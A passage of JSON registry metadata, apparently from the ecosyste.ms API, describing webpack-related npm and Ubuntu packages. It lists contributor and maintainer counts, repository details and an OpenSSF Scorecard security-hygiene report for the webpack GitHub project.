itHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":428,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rld-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rld-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rld-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rld-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rld-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/rld-webpack/codemeta","maintainers":[{"uuid":"chances1010","login":"chances1010","name":null,"email":"1027519991@qq.com","url":null,"packages_count":1,"html_url":"https://www.npmjs.com/~chances1010","role":null,"created_at":"2022-11-14T07:08:52.694Z","updated_at":"2022-11-14T07:08:52.694Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/chances1010/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":13795144,"name":"node-webpack","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/webpack/webpack","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-13T16:16:58.231Z","latest_release_published_at":"2026-02-13T16:16:58.231Z","latest_release_number":"5.76.1+dfsg1+~cs17.16.16-1","last_synced_at":"2026-03-13T22:21:45.476Z","created_at":"2026-02-13T16:16:57.916Z","updated_at":"2026-08-30T14:55:25.195Z","registry_url":"https://launchpad.net/ubuntu/+source/node-webpack","install_command":"apt-get install node-webpack","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"webpack","standards_version":"4.6.2","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-nodejs, dh-sequence-nodejs, jest (\u003e= 29) \u003c!nocheck\u003e, node-acorn (\u003e= 8.5.0+ds+~cs24.17.6~), node-babel7, node-browserslist \u003c!nocheck\u003e, node-chrome-trace-event \u003c!nocheck\u003e, node-colorette, node-commander, node-enhanced-resolve \u003c!nocheck\u003e, node-es-module-lexer, node-eslint-scope \u003c!nocheck\u003e, node-eslint-visitor-keys, node-esrecurse \u003c!nocheck\u003e, node-estraverse \u003c!nocheck\u003e, node-events \u003c!nocheck\u003e, node-findup-sync \u003c!nocheck\u003e, node-graceful-fs \u003c!nocheck\u003e, node-interpret (\u003e= 2.2~) \u003c!nocheck\u003e, node-json-parse-better-errors \u003c!nocheck\u003e, node-libs-browser \u003c!nocheck\u003e, node-loader-runner \u003c!nocheck\u003e, node-mime-types \u003c!nocheck\u003e, node-neo-async \u003c!nocheck\u003e, node-p-limit \u003c!nocheck\u003e, node-rechoir, node-resolve-cwd \u003c!nocheck\u003e, node-rollup-plugin-commonjs, node-rollup-plugin-json, node-rollup-plugin-node-resolve, node-rollup-plugin-terser, node-schema-utils \u003c!nocheck\u003e, node-supports-color \u003c!nocheck\u003e, node-tapable (\u003e= 2.0~), node-typescript, node-watchpack \u003c!nocheck\u003e, node-webassemblyjs (\u003e= 1.9.1+dfsg+~cs11.9.35~) \u003c!nocheck\u003e, node-webpack-merge (\u003e= 5.8.0~), node-webpack-sources (\u003e= 3.2.1~) \u003c!nocheck\u003e, node-yargs \u003c!nocheck\u003e, rollup, terser \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebp